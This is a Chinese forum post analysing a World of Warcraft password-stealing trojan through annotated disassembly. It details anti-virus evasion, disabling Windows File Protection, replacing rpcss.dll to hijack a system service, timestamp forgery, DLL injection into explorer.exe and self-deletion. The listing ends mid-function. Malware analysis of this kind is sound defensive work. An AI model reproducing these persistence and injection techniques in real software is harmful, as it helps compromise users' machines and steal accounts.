魔兽盗号木马Trojan.Win32.OnlineGame.PSW分析
（本帖最后由 qiang 于 2010-1-29 11:50 编辑）【加壳类型】Upack
【调试工具】OD
脱壳后来到入口点,[code]00401000 55 push ebp ; kernel32.GetProcAddress
00401001 8BEC mov ebp, esp
00401003 81EC 300A0000 sub esp, 0A30
00401009 90 nop
0040100A 90 nop
0040100B E8 70010000 call 00401180 关键call 1
00401010 8D85 E8FBFFFF lea eax, dword ptr [ebp-418]
00401016 50 push eax
00401017 E8 74010000 call 00401190 关键call 2
0040101C 83C4 04 add esp, 4
0040101F 8D8D E4FAFFFF lea ecx, dword ptr [ebp-51C]
00401025 . 68 04010000 push 104 ; /BufSize = 104 (260.)
0040102A . 51 push ecx ; |PathBuffer
0040102B . 6A 00 push 0 ; |hModule = NULL
0040102D . FF15 34304000 call dword ptr [403034] ; \GetModuleFileNameA
00401033 . 8D95 E8FBFFFF lea edx, dword ptr [ebp-418]
00401039 . 52 push edx
0040103A . 6A 65 push 65
0040103C . 68 C04C4000 push 00404CC0 ; ASCII "GetName"
00401041 . 6A 00 push 0
00401043 . E8 88010000 call 004011D0
00401048 . 8D85 ECFCFFFF lea eax, dword ptr [ebp-314] ; 上一条 call 004011D0(0, "GetName", 65, 临时路径) 把自身资源释放为文件 ~358629.~~~(文件名由关键 call 2 生成;参数形式与下文释放 "BIN" 资源的 10001479 一致,推测是同类的资源释放函数)
0040104E . 50 push eax
0040104F . 68 A84C4000 push 00404CA8 ; ASCII "system32\t329076.ini"
00401054 . E8 F7020000 call 00401350 字符串连接得到C:\WINDOWS\system32\t329076.ini
00401059 . 68 04204000 push 00402004
0040105E . 8D8D ECFCFFFF lea ecx, dword ptr [ebp-314]
00401064 . 68 A44C4000 push 00404CA4 ; ASCII "9*&"
00401069 . 51 push ecx
0040106A . E8 A1040000 call 00401510 字符处理函数
0040106F . 68 20070000 push 720
00401074 . 8D95 ECFCFFFF lea edx, dword ptr [ebp-314]
0040107A . 68 00404000 push 00404000
0040107F . 52 push edx
00401080 . E8 4B030000 call 004013D0 生成配置文件t329076.ini
00401085 . 8D85 F4FEFFFF lea eax, dword ptr [ebp-10C]
0040108B . 50 push eax
0040108C . 68 944C4000 push 00404C94 ; ASCII "ru9*&ndll32.exe"
00401091 . E8 FA020000 call 00401390
00401096 . 68 04204000 push 00402004
0040109B . 8D8D F4FEFFFF lea ecx, dword ptr [ebp-10C]
004010A1 . 68 A44C4000 push 00404CA4 ; ASCII "9*&"
004010A6 . 51 push ecx
004010A7 . E8 64040000 call 00401510 字符处理函数
004010AC . 83C4 44 add esp, 44
004010AF . 8D95 F0FDFFFF lea edx, dword ptr [ebp-210]
004010B5 . 52 push edx
004010B6 . 68 884C4000 push 00404C88 ; ASCII "t329076.exe"
004010BB . E8 D0020000 call 00401390 字符串连接得到C:\WINDOWS\system32\t329076.exe
004010C0 . 8D85 D0F5FFFF lea eax, dword ptr [ebp-A30]
004010C6 . 50 push eax
004010C7 . 68 804C4000 push 00404C80 ; ASCII "avp.exe"
004010CC . E8 AF010000 call 00401280 建进程快照,
004010D1 . 83C4 10 add esp, 10
004010D4 . 85C0 test eax, eax
004010D6 . 7E 43 jle short 0040111B ; 00401280 返回值<=0(进程快照里没有 avp.exe)则跳过下面的复制,直接走 rundll32.exe 路径
004010D8 . 56 push esi
004010D9 . 57 push edi
004010DA . 8D8D F0FDFFFF lea ecx, dword ptr [ebp-210]
004010E0 . 6A 01 push 1 ; /FailIfExists = TRUE
004010E2 . 8D95 F4FEFFFF lea edx, dword ptr [ebp-10C] ; |
004010E8 . 51 push ecx ; |NewFileName
004010E9 . 52 push edx ; |ExistingFileName
004010EA . FF15 38304000 call dword ptr [403038] ; \CopyFileA
004010F0 . 8DBD F0FDFFFF lea edi, dword ptr [ebp-210]
004010F6 . 83C9 FF or ecx, FFFFFFFF
004010F9 . 33C0 xor eax, eax
004010FB . 8D95 F4FEFFFF lea edx, dword ptr [ebp-10C]
00401101 . F2:AE repne scas byte ptr es:[edi]
00401103 . F7D1 not ecx
00401105 . 2BF9 sub edi, ecx
00401107 . 8BC1 mov eax, ecx
00401109 . 8BF7 mov esi, edi
0040110B . 8BFA mov edi, edx
0040110D . C1E9 02 shr ecx, 2
00401110 . F3:A5 rep movs dword ptr es:[edi], dword p>
00401112 . 8BC8 mov ecx, eax
00401114 . 83E1 03 and ecx, 3
00401117 . F3:A4 rep movs byte ptr es:[edi], byte ptr>
00401119 . 5F pop edi
0040111A . 5E pop esi
0040111B > 8B0D 784C4000 mov ecx, dword ptr [404C78]
00401121 . 66:8B15 7C4C400>mov dx, word ptr [404C7C]
00401128 . A0 7E4C4000 mov al, byte ptr [404C7E]
0040112D . 894D F8 mov dword ptr [ebp-8], ecx
00401130 . 66:8955 FC mov word ptr [ebp-4], dx
00401134 . 8D8D E4FAFFFF lea ecx, dword ptr [ebp-51C]
0040113A . 8845 FE mov byte ptr [ebp-2], al
0040113D . 8D95 E8FBFFFF lea edx, dword ptr [ebp-418]
00401143 . 51 push ecx ; /<%s>
00401144 . 8D85 F4FEFFFF lea eax, dword ptr [ebp-10C] ; |
0040114A . 52 push edx ; |<%s>
0040114B . 8D4D F8 lea ecx, dword ptr [ebp-8] ; |
0040114E . 50 push eax ; |<%s>
0040114F . 51 push ecx ; |<%s>
00401150 . 8D95 E0F9FFFF lea edx, dword ptr [ebp-620] ; |
00401156 . 68 644C4000 push 00404C64 ; |Format = "%s %s %s GetName %s"
0040115B . 52 push edx ; |s
0040115C . FF15 60304000 call dword ptr [403060] ; \wsprintfA
00401162 . 83C4 18 add esp, 18
00401165 . 8D85 E0F9FFFF lea eax, dword ptr [ebp-620]
0040116B . 6A 00 push 0 ; /ShowState = SW_HIDE
0040116D . 50 push eax ; |CmdLine
0040116E . FF15 3C304000 call dword ptr [40303C] ; \WinExec 以 SW_HIDE 隐藏窗口执行。逻辑:关键 call 00401280 用进程快照查找 avp.exe(卡巴斯基的进程名),找到时先把 C:\WINDOWS\system32\rundll32.exe 复制为同目录下的 t329076.exe(CopyFileA,FailIfExists=TRUE),再把 t329076.exe 路径覆盖到 [ebp-10C],用它代替 rundll32.exe 以 GetName 和病毒自身路径为参数加载 ~358629.~~~(推测是为了绕过杀软对 rundll32 的监控);没找到则直接调用 rundll32.exe 带同样参数。命令行格式为 "%s %s %s GetName %s",第一个 %s 是从 404C78 拷贝到 [ebp-8] 的 7 字节字符串,本帖未给出其内容
00401174 . 33C0 xor eax, eax
00401176 . 8BE5 mov esp, ebp
00401178 . 5D pop ebp
00401179 . C2 1000 retn 10 外层结束[/code]进入关键call 1,代码如下:[code]00401180 . 6A 23 push 23
00401182 . 68 C84E4000 push 00404EC8
00401187 . E8 94020000 call 00401420 关键call 3
0040118C . 83C4 08 add esp, 8
0040118F . C3 retn[/code]进入关键call 3,代码如下:[code]00401420 /$ 81EC 0C020000 sub esp, 20C
00401426 |. 8B8424 14020000 mov eax, dword ptr [esp+214]
0040142D |. 53 push ebx
0040142E |. 55 push ebp
0040142F |. 56 push esi
00401430 |. 85C0 test eax, eax
00401432 |. 57 push edi
00401433 |. C74424 10 00000>mov dword ptr [esp+10], 0
0040143B |. 0F8E B0000000 jle 004014F1
00401441 |. 8B8424 20020000 mov eax, dword ptr [esp+220]
00401448 |. 8B1D 08304000 mov ebx, dword ptr [403008] ; kernel32.lstrcpyA
0040144E |. 8B2D 00304000 mov ebp, dword ptr [403000] ; kernel32.GetProcAddress
00401454 |. 8D78 08 lea edi, dword ptr [eax+8]
00401457 |> 8B4F F8 /mov ecx, dword ptr [edi-8]
0040145A |. 8D5424 14 |lea edx, dword ptr [esp+14]
0040145E |. 51 |push ecx
0040145F |. 52 |push edx
00401460 |. FFD3 |call ebx
00401462 |. 68 04204000 |push 00402004
00401467 |. 8D4424 18 |lea eax, dword ptr [esp+18]
0040146B |. 68 A44C4000 |push 00404CA4 ; ASCII "9*&"
00401470 |. 50 |push eax
00401471 |. E8 9A000000 |call 00401510
00401476 |. 83C4 0C |add esp, 0C
00401479 |. 8D4C24 14 |lea ecx, dword ptr [esp+14]
0040147D |. 51 |push ecx ; /pModule
0040147E |. FF15 10304000 |call dword ptr [403010] ; \GetModuleHandleA 取当前表项的 DLL 名(去掉 "9*&" 后,例如 kernel32.dll)对应的模块基址;表在 00404EC8,共 0x23 项,每项 12 字节:DLL 名指针、API 名指针、保存地址用的指针(edi 每轮 +0C)。模块未加载时下面改用 LoadLibraryA 加载
00401484 |. 8BF0 |mov esi, eax
00401486 |. 85F6 |test esi, esi
00401488 |. 75 11 |jnz short 0040149B
0040148A |. 8D5424 14 |lea edx, dword ptr [esp+14]
0040148E |. 52 |push edx ; /FileName
0040148F |. FF15 04304000 |call dword ptr [403004] ; \LoadLibraryA kernel32.DLL
00401495 |. 8BF0 |mov esi, eax
00401497 |. 85F6 |test esi, esi
00401499 |. 74 66 |je short 00401501
0040149B |> 8B47 FC |mov eax, dword ptr [edi-4]
0040149E |. 8D8C24 18010000 |lea ecx, dword ptr [esp+118]
004014A5 |. 50 |push eax
004014A6 |. 51 |push ecx
004014A7 |. FFD3 |call ebx
004014A9 |. 68 04204000 |push 00402004
004014AE |. 8D9424 1C010000 |lea edx, dword ptr [esp+11C]
004014B5 |. 68 A44C4000 |push 00404CA4 ; ASCII "9*&"
004014BA |. 52 |push edx
004014BB |. E8 50000000 |call 00401510 //字符处理获得API函数名
004014C0 |. 83C4 0C |add esp, 0C
004014C3 |. 8D8424 18010000 |lea eax, dword ptr [esp+118]
004014CA |. 50 |push eax
004014CB |. 56 |push esi
004014CC |. FFD5 |call ebp kernel32.GetProcAddress 获取API函数地址
004014CE |. 85C0 |test eax, eax
004014D0 |. 74 2F |je short 00401501
004014D2 |. 8B0F |mov ecx, dword ptr [edi]
004014D4 |. 83C7 0C |add edi, 0C
004014D7 |. 8901 |mov dword ptr [ecx], eax 把API函数地址保存到[ecx]地址
004014D9 |. 8B4424 10 |mov eax, dword ptr [esp+10]
004014DD |. 8B8C24 24020000 |mov ecx, dword ptr [esp+224]
004014E4 |. 40 |inc eax ; eax 是已处理的函数个数,与 [esp+224] 传入的总数(0x23)比较,判断是否所有函数地址都已获取
004014E5 |. 3BC1 |cmp eax, ecx
004014E7 |. 894424 10 |mov dword ptr [esp+10], eax
004014EB |.^ 0F8C 66FFFFFF \jl 00401457 循环获取API地址,获取完所有函数地址往下
004014F1 |> 5F pop edi
004014F2 |. 5E pop esi
004014F3 |. 5D pop ebp
004014F4 |. B8 01000000 mov eax, 1
004014F9 |. 5B pop ebx
004014FA |. 81C4 0C020000 add esp, 20C
00401500 |. C3 retn
00401501 |> 5F pop edi
00401502 |. 5E pop esi
00401503 |. 5D pop ebp
00401504 |. 33C0 xor eax, eax
00401506 |. 5B pop ebx
00401507 |. 81C4 0C020000 add esp, 20C
0040150D \. C3 retn[/code]进入关键call 2,代码如下:[code]00401190 . 81EC 04010000 sub esp, 104
00401196 . 8D4424 00 lea eax, dword ptr [esp]
0040119A . 50 push eax ; /Buffer
0040119B . 68 04010000 push 104 ; |BufSize = 104 (260.)
004011A0 . FF15 30304000 call dword ptr [403030] ; \GetTempPathA
004011A6 . FF15 2C304000 call dword ptr [40302C] ; [GetTickCount
004011AC . 8B9424 08010000 mov edx, dword ptr [esp+108]
004011B3 . 8D4C24 00 lea ecx, dword ptr [esp]
004011B7 . 50 push eax ; /<%06x>
004011B8 . 51 push ecx ; |<%s>
004011B9 . 68 58534000 push 00405358 ; |Format = "%s~%06x.~~~"
004011BE . 52 push edx ; |s
004011BF . FF15 60304000 call dword ptr [403060] ; \wsprintfA连接字符串得到C:\DOCUME~1\safe\LOCALS~1\Temp\~358629.~~~
004011C5 . 81C4 14010000 add esp, 114
004011CB . C3 retn[/code]~0452d3.~~~ 是另一次运行时释放出的同一个 DLL(文件名由 GetTickCount 低位生成,每次运行都不同,前面出现的 ~358629.~~~ 与它是同一文件),下面分析它的导出函数 GetName
用OD打开文件,进程:rundll32.exe
参数:"C:\Documents and Settings\safe\桌面\~0452d3.~~~" GetName "C:\Documents and Settings\safe\桌面\2.exe"
运行,在导出函数上下断点,再 Ctrl+F2 重新载入,再 F9 运行,就会断在 GetName 函数上,可以开始调试了。
或者加载了~0452d3.~~~,找到GetName函数处,新建一个EIP[code]10001238 ~>/$ 55 push ebp
10001239 |. 8BEC mov ebp, esp
1000123B |. 81EC 20080000 sub esp, 820
10001241 |. 8A15 202A0110 mov dl, byte ptr [10012A20]
10001247 |. 53 push ebx
10001248 |. 56 push esi
10001249 |. 57 push edi
1000124A |. 6A 40 push 40
1000124C |. 33C0 xor eax, eax
1000124E |. 59 pop ecx
1000124F |. 8DBD F9FDFFFF lea edi, dword ptr [ebp-207]
10001255 |. 8895 F8FDFFFF mov byte ptr [ebp-208], dl
1000125B |. 6A 40 push 40
1000125D |. F3:AB rep stos dword ptr es:[edi]
1000125F |. 66:AB stos word ptr es:[edi]
10001261 |. AA stos byte ptr es:[edi]
10001262 |. 59 pop ecx
10001263 |. 33C0 xor eax, eax
10001265 |. 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
1000126B |. 8895 FCFEFFFF mov byte ptr [ebp-104], dl
10001271 |. F3:AB rep stos dword ptr es:[edi]
10001273 |. 66:AB stos word ptr es:[edi]
10001275 |. AA stos byte ptr es:[edi]
10001276 |. 8D85 F8FDFFFF lea eax, [local.130]
1000127C |. 50 push eax
1000127D |. 68 C0500110 push 100150C0 ; t3rpcss.dll
10001282 |. E8 C0070000 call 10001A47 字符串连接函数
10001287 |. 59 pop ecx
10001288 |. 8D85 F8FDFFFF lea eax, [local.130]
1000128E |. 59 pop ecx
1000128F |. 50 push eax
10001290 |. FF15 342A0110 call dword ptr [10012A34] ; shlwapi.PathFileExistsA
10001296 |. 85C0 test eax, eax
10001298 |. BB 202A0110 mov ebx, 10012A20
1000129D |. 0F85 93000000 jnz 10001336
100012A3 |. 8D85 FCFEFFFF lea eax, [local.65]
100012A9 |. 50 push eax
100012AA |. 68 B0500110 push 100150B0 ; rpc9*&ss.dll
100012AF |. E8 93070000 call 10001A47
100012B4 |. 53 push ebx
100012B5 |. 8D85 FCFEFFFF lea eax, [local.65]
100012BB |. 68 10500110 push 10015010 ; 9*&expl9*&orer.exet3svchos9*&t.exe
100012C0 |. 50 push eax
100012C1 |. E8 E6090000 call 10001CAC
100012C6 |. 8D85 FCFEFFFF lea eax, [local.65]
100012CC |. 50 push eax
100012CD |. E8 CB020000 call 1000159D 调用 sfc_os.dll 序号 #5 的导出函数(通常即 SfcFileException)让 WFP(Windows 文件保护)放过对 "C:\WINDOWS\system32\rpcss.dll" 的下一次修改,为后面替换该文件做准备
100012D2 |. 8D85 F4FCFFFF lea eax, [local.195]
100012D8 |. 50 push eax
100012D9 |. 68 88500110 push 10015088 ; ..\ServicePackFiles\i386\rpc9*&ss.dll
100012DE |. E8 64070000 call 10001A47
100012E3 |. 53 push ebx ; /s2
100012E4 |. 53 push ebx ; |s1
100012E5 |. E8 4E0C0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
100012EA |. 8B35 80400110 mov esi, dword ptr [<&KERNEL32.Delet>; kernel32.DeleteFileA
100012F0 |. 83C4 28 add esp, 28
100012F3 |. 8D85 F4FCFFFF lea eax, [local.195]
100012F9 |. 50 push eax ; /FileName
100012FA |. FFD6 call esi ; \DeleteFileA 删除 ..\ServicePackFiles\i386\rpcss.dll,下面还会删除 dllcache\rpcss.dll——这两处是 WFP 还原系统文件时使用的备份副本,删掉后被替换的 rpcss.dll 就不会被自动还原
100012FC |. 8D85 F4FCFFFF lea eax, [local.195]
10001302 |. 50 push eax
10001303 |. 68 70500110 push 10015070 ; dllcache\rpc9*&ss.dll
10001308 |. E8 3A070000 call 10001A47
1000130D |. 53 push ebx ; /s2
1000130E |. 53 push ebx ; |s1
1000130F |. E8 240C0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
10001314 |. 83C4 10 add esp, 10
10001317 |. 8D85 F4FCFFFF lea eax, [local.195]
1000131D |. 50 push eax
1000131E |. FFD6 call esi
10001320 |. 8D85 F8FDFFFF lea eax, [local.130]
10001326 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
10001328 |. 50 push eax ; |NewName
10001329 |. 8D85 FCFEFFFF lea eax, [local.65] ; |
1000132F |. 50 push eax ; |ExistingName
10001330 |. FF15 84400110 call dword ptr [<&KERNEL32.MoveFileE>; \MoveFileExA 把原来的 "C:\WINDOWS\system32\rpcss.dll" 移动(重命名)为同目录下的 t3rpcss.dll——注意是移动不是拷贝,标志 MOVEFILE_REPLACE_EXISTING——腾出 rpcss.dll 这个文件名
10001336 |> 8D85 FCFEFFFF lea eax, [local.65]
1000133C |. 6A 01 push 1 ; /FailIfExists = TRUE
1000133E |. 50 push eax ; |NewFileName
1000133F |. 68 0C210010 push 1000210C ; |ExistingFileName ="C:\Documents and Settings\safe\桌面\~0452d3.~~~"
10001344 |. FF15 88400110 call dword ptr [<&KERNEL32.CopyFileA>; \CopyFileA 把释放出来的 ~358629.~~~ 复制为 system32\rpcss.dll。这里 FailIfExists=TRUE,所以上面必须先把真正的 rpcss.dll 移走才能成功。rpcss.dll 是 svchost.exe 承载的 RPCSS 服务 DLL,替换它等于劫持系统服务,这是木马的持久化手段
1000134A |. 8D85 F8FDFFFF lea eax, [local.130]
10001350 |. 50 push eax
10001351 |. 8D85 FCFEFFFF lea eax, [local.65]
10001357 |. 50 push eax
10001358 |. E8 6D0A0000 call 10001DCA // 读取一个文件的时间并写到另一个上,使新 rpcss.dll 与被改名的原文件 t3rpcss.dll 时间一致(时间戳伪造,推测是为了躲避按文件时间排查)。原帖说是取 rpcss.dll 的时间写到 t3rpcss.dll;从掩盖替换痕迹的目的看更可能是反过来,具体方向需按 10001DCA 内部确认
1000135D |. 8D85 FCFEFFFF lea eax, [local.65]
10001363 |. 50 push eax
10001364 |. 68 3C500110 push 1001503C ; system32\t329076.dll
10001369 |. E8 81060000 call 100019EF 字符处理,这里获得C:\system32\t329076.dll
1000136E |. 53 push ebx
1000136F |. 8D85 FCFEFFFF lea eax, [local.65]
10001375 |. 68 10500110 push 10015010 ; 9*&expl9*&orer.exet3svchos9*&t.exe
1000137A |. 50 push eax
1000137B |. E8 2C090000 call 10001CAC
10001380 |. 8D85 FCFEFFFF lea eax, [local.65]
10001386 |. 50 push eax
10001387 |. 6A 65 push 65
10001389 |. 68 38500110 push 10015038 ; BINsystem32\t329076.dll
1000138E |. FF35 04200010 push dword ptr [10002004]
10001394 |. E8 E0000000 call 10001479 获取自身资源,生成C:\system32\t329076.dll文件,文件数据经过加密处理
10001399 |. BE 14500110 mov esi, 10015014 ; expl9*&orer.exet3svchos9*&t.exe
1000139E |. 8DBD F0FBFFFF lea edi, [local.260]
100013A4 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A5 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A6 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A7 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A8 |. 6A 3D push 3D
100013AA |. 33C0 xor eax, eax
100013AC |. 59 pop ecx
100013AD |. 8DBD 00FCFFFF lea edi, [local.256]
100013B3 |. F3:AB rep stos dword ptr es:[edi]
100013B5 |. 53 push ebx
100013B6 |. 8D85 F0FBFFFF lea eax, [local.260]
100013BC |. 68 10500110 push 10015010 ; 9*&expl9*&orer.exet3svchos9*&t.exe
100013C1 |. 50 push eax
100013C2 |. E8 E5080000 call 10001CAC
100013C7 |. 8D85 E0F7FFFF lea eax, [local.520]
100013CD |. 50 push eax
100013CE |. 8D85 F0FBFFFF lea eax, [local.260]
100013D4 |. 50 push eax
100013D5 |. E8 67030000 call 10001741 建进程快照,找到explorer.exe的PID
100013DA |. 83C4 40 add esp, 40
100013DD |. 85C0 test eax, eax
100013DF |. 7E 44 jle short 10001425
100013E1 |. FFB5 E0F7FFFF push [local.520] ; /<%d>
100013E7 |. 8D85 F8FDFFFF lea eax, [local.130] ; |
100013ED |. 68 08500110 push 10015008 ; |t3290769*&expl9*&orer.exet3svchos9*&t.exe
100013F2 |. 68 00500110 push 10015000 ; |%s%d
100013F7 |. 50 push eax ; |s
100013F8 |. FF15 C8400110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
100013FE |. 8D85 F8FDFFFF lea eax, [local.130]
10001404 |. 50 push eax
10001405 |. E8 46020000 call 10001650 ; 与 100011E8 处同一函数,按原帖分析是创建互斥量,名字为 "t329076"+explorer.exe 的 PID;返回非 0 时(下面 jnz)跳过注入,避免重复注入同一个 explorer
1000140A |. 83C4 14 add esp, 14
1000140D |. 85C0 test eax, eax
1000140F |. 75 14 jnz short 10001425
10001411 |. 8D85 FCFEFFFF lea eax, [local.65]
10001417 |. 50 push eax
10001418 |. FFB5 E0F7FFFF push [local.520]
1000141E |. E8 F4020000 call 10001717 关键call 4
10001423 |. 59 pop ecx
10001424 |. 59 pop ecx
10001425 |> 6A 01 push 1
10001427 |. 5E pop esi
10001428 |> 53 /push ebx ; /s2 = "C:\Documents and Settings\safe\桌面\2.exe""
10001429 |. 53 |push ebx ; |s1
1000142A |. E8 090B0000 |call <jmp.&MSVCRT.strcmp> ; \strcmp
1000142F |. 59 |pop ecx
10001430 |. 59 |pop ecx
10001431 |. FF75 10 |push [arg.3] ; /FileName
10001434 |. FF15 80400110 call dword ptr [<&KERNEL32.DeleteFi>; \DeleteFileA 删除 [arg.3]——即 GetName 的第三个参数,也就是命令行里传入的病毒主体(2.exe)路径,属于自删除。最多重试 0x14=20 次,每次 Sleep 200ms,因为主体进程可能还没退出
1000143A |. 53 |push ebx ; /s2
1000143B |. 53 |push ebx ; |s1
1000143C |. E8 F70A0000 |call <jmp.&MSVCRT.strcmp> ; \strcmp
10001441 |. 59 |pop ecx
10001442 |. 59 |pop ecx
10001443 |. FF75 10 |push [arg.3]
10001446 |. FF15 342A0110 |call dword ptr [10012A34]
1000144C |. 85C0 |test eax, eax
1000144E |. 74 13 |je short 10001463 如果文件删除掉了就退出
10001450 |. 68 C8000000 |push 0C8 ; /Timeout = 200. ms
10001455 |. FF15 98400110 |call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
1000145B |. 8BC6 |mov eax, esi
1000145D |. 46 |inc esi
1000145E |. 83F8 14 |cmp eax, 14
10001461 |.^ 7C C5 \jl short 10001428
10001463 |> 5F pop edi
10001464 |. 5E pop esi
10001465 |. 5B pop ebx
10001466 |. C9 leave
10001467 \. C2 1000 retn 10[/code]进入关键call 4,代码如下:[code]10001717 /$ 56 push esi
10001718 |. FF7424 08 push dword ptr [esp+8]
1000171C |. 6A 00 push 0 ; bInheritHandle = FALSE(不是"打开方式")
1000171E |. 6A 2A push 2A ; dwDesiredAccess = 0x2A = PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE(不是进程 ID;PID 是上一条 push [esp+8])
10001720 |. FF15 9C2A0110 call dword ptr [10012A9C] kernel32.OpenProcess 打开 explorer.exe,申请的权限正好是远程线程注入所需的最小集合
10001726 |. 8BF0 mov esi, eax
10001728 |. 85F6 test esi, esi
1000172A |. 74 13 je short 1000173F
1000172C |. FF7424 0C push dword ptr [esp+C]
10001730 |. 56 push esi
10001731 |. E8 56FFFFFF call 1000168C 关键call 5,在explorer.exe进程中创建远程线程
10001736 |. 59 pop ecx
10001737 |. 59 pop ecx
10001738 |. 56 push esi
10001739 |. FF15 982A0110 call dword ptr [10012A98] ; kernel32.CloseHandle 关闭句柄
1000173F |> 5E pop esi
10001740 \. C3 retn[/code]进入关键call 5,代码如下:[code]1000168C /$ 55 push ebp
1000168D |. 8BEC mov ebp, esp
1000168F |. 51 push ecx
10001690 |. 51 push ecx
10001691 |. 53 push ebx
10001692 |. 56 push esi
10001693 |. 57 push edi
10001694 |. FF75 0C push [arg.2] ; /String
10001697 |. FF15 24400110 call dword ptr [<&KERNEL32.lstrlenA>>; \lstrlenA
1000169D |. 8B5D 08 mov ebx, [arg.1]
100016A0 |. 8BF0 mov esi, eax
100016A2 |. 46 inc esi
100016A3 |. 6A 40 push 40 ; /flProtect = 40 (64.)
100016A5 |. 68 00100000 push 1000 ; |flAllocationType = 1000 (4096.)
100016AA |. 56 push esi ; |dwSize
100016AB |. 6A 00 push 0 ; |lpAddress = NULL
100016AD |. 53 push ebx ; |hProcess
100016AE |. FF15 40400110 call dword ptr [<&KERNEL32.VirtualAl>; \VirtualAllocEx 在 ebx(explorer.exe 进程句柄)对应的进程里申请 lstrlen(DLL 路径)+1 字节(esi),MEM_COMMIT(0x1000),保护属性 PAGE_EXECUTE_READWRITE(0x40)——只是存放一个字符串却申请可执行内存,本身就是一个可用于检测的特征
100016B4 |. 8BF8 mov edi, eax
100016B6 |. 85FF test edi, edi
100016B8 |. 74 3B je short 100016F5
100016BA |. 8D45 FC lea eax, [local.1]
100016BD |. 50 push eax
100016BE |. 56 push esi
100016BF |. FF75 0C push [arg.2]
100016C2 |. 57 push edi
100016C3 |. 53 push ebx
100016C4 |. FF15 842A0110 call dword ptr [10012A84] ; kernel32.WriteProcessMemory //往申请的内存块里写进C:\WINDOWS\system32\t329076.dll字符串
100016CA |. 85C0 test eax, eax
100016CC |. 74 27 je short 100016F5
100016CE |. 8D45 F8 lea eax, [local.2]
100016D1 |. 50 push eax
100016D2 |. 33C0 xor eax, eax
100016D4 |. 50 push eax
100016D5 |. 57 push edi
100016D6 |. FF35 2C400110 push dword ptr [<&KERNEL32.LoadLibra>; kernel32.LoadLibraryA
100016DC |. 50 push eax
100016DD |. 50 push eax
100016DE |. 53 push ebx
100016DF |. FF15 A82A0110 call dword ptr [10012AA8] ; 动态解析的 API,参数 (hProcess, NULL, 0, LoadLibraryA, 远程字符串地址, 0, &tid) 与 CreateRemoteThread 完全一致:以 LoadLibraryA 为线程入口、DLL 路径为参数,让 explorer.exe 加载 t329076.dll(典型的远程线程 DLL 注入)
100016E5 |. 85C0 test eax, eax
100016E7 |. 8945 0C mov [arg.2], eax
100016EA |. 74 09 je short 100016F5
100016EC |. 6A FF push -1 ; /Timeout = INFINITE
100016EE |. 50 push eax ; |hObject
100016EF |. FF15 3C400110 call dword ptr [<&KERNEL32.WaitForSi>; \WaitForSingleObject //等待线程结束信号
100016F5 |> 68 00400000 push 4000 ; /dwFreeType = 4000 (16384.)
100016FA |. 56 push esi ; |dwSize
100016FB |. 57 push edi ; |lpAddress
100016FC |. 53 push ebx ; |hProcess
100016FD |. FF15 38400110 call dword ptr [<&KERNEL32.VirtualFr>; \VirtualFreeEx //释放刚才申请的内存块
10001703 |. 837D 0C 00 cmp [arg.2], 0
10001707 |. 5F pop edi
10001708 |. 5E pop esi
10001709 |. 5B pop ebx
1000170A |. 74 09 je short 10001715
1000170C |. FF75 0C push [arg.2]
1000170F |. FF15 982A0110 call dword ptr [10012A98] ; kernel32.CloseHandle
10001715 |> C9 leave
10001716 \. C3 retn[/code]C:\WINDOWS\system32\rpcss.dll分析[code]100010C5 r>/$ 55 push ebp
100010C6 |. 8BEC mov ebp, esp
100010C8 |. 81EC 08020000 sub esp, 208
100010CE |. 837D 0C 01 cmp [arg.2], 1
100010D2 |. 56 push esi
100010D3 |. 57 push edi
100010D4 |. 0F85 55010000 jnz 1000122F
100010DA |. 53 push ebx
100010DB |. E8 8A030000 call 1000146A //获取API函数地址
100010E0 |. 8B45 08 mov eax, [arg.1]
100010E3 |. 8B35 8C400110 mov esi, dword ptr [<&KERNEL32.GetMo>; kernel32.GetModuleFileNameA
100010E9 |. BF 04010000 mov edi, 104
100010EE |. A3 04200010 mov dword ptr [10002004], eax
100010F3 |. 57 push edi ; /BufSize => 104 (260.)
100010F4 |. 68 0C210010 push 1000210C ; |PathBuffer = rpcss.1000210C
100010F9 |. 50 push eax ; |hModule
100010FA |. FFD6 call esi ; \GetModuleFileNameA
100010FC |. BB 08200010 mov ebx, 10002008
10001101 |. 57 push edi ; /BufSize => 104 (260.)
10001102 |. 53 push ebx ; |PathBuffer => rpcss.10002008
10001103 |. 6A 00 push 0 ; |hModule = NULL
10001105 |. FFD6 call esi ; \GetModuleFileNameA
10001107 |. E8 8A090000 call 10001A96 设置自己为"SeDebugPrivilege"权限
1000110C |. BE 60500110 mov esi, 10015060 ; ASCII "svchos9*&t.exe"
10001111 |. 8DBD F8FDFFFF lea edi, [local.130] 把svchos9*&t.exe字符串拷贝到[edi]指向的地址
10001117 |. A5 movs dword ptr es:[edi], dword ptr [>
10001118 |. A5 movs dword ptr es:[edi], dword ptr [>
10001119 |. A5 movs dword ptr es:[edi], dword ptr [>
1000111A |. 66:A5 movs word ptr es:[edi], word ptr [es>
1000111C |. A4 movs byte ptr es:[edi], byte ptr [es>
1000111D |. 6A 3D push 3D
1000111F |. 33C0 xor eax, eax
10001121 |. 59 pop ecx
10001122 |. 8DBD 07FEFFFF lea edi, dword ptr [ebp-1F9]
10001128 |. F3:AB rep stos dword ptr es:[edi]
1000112A |. BE 202A0110 mov esi, 10012A20
1000112F |. AA stos byte ptr es:[edi]
10001130 |. 56 push esi
10001131 |. 8D85 F8FDFFFF lea eax, [local.130]
10001137 |. 68 10500110 push 10015010 ; ASCII "9*&"
1000113C |. 50 push eax
1000113D |. E8 6A0B0000 call 10001CAC 字符处理函数1,除去9*&,这里得到字符串svchost.exe
10001142 |. 83C4 0C add esp, 0C
10001145 |. 8D85 F8FDFFFF lea eax, [local.130]
1000114B |. 50 push eax
1000114C |. 53 push ebx
1000114D |. FF15 302A0110 call dword ptr [10012A30] 未解析的 API,传入当前进程路径(ebx)和 "svchost.exe",按下面对返回值的判断方式推测是 StrStrIA 一类的子串匹配
10001153 |. 85C0 test eax, eax
10001155 |. 5B pop ebx
